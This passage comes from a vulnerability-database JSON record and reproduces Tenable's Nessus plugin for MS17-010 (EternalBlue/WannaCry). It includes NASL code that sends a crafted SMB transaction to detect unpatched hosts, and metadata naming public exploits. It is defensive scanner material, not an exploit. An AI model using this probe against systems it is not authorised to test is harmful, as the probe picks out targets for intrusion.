(data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-18T12:44:33", "differentElements": ["vpr"], "edition": 12}, {"bulletin": {"id": "MS17-010.NASL", "hash": "c5c146b305e2f4b1abd96ec9c5d3d69f", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?b9d9ebf9", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?8dcab5e4", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?234f8ef8"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-19T00:54:11", "history": [], "viewCount": 7182, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-19T00:54:11", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-19T00:54:11", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-19T00:54:11", "differentElements": ["vpr"], "edition": 13}], "viewCount": 7210, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": 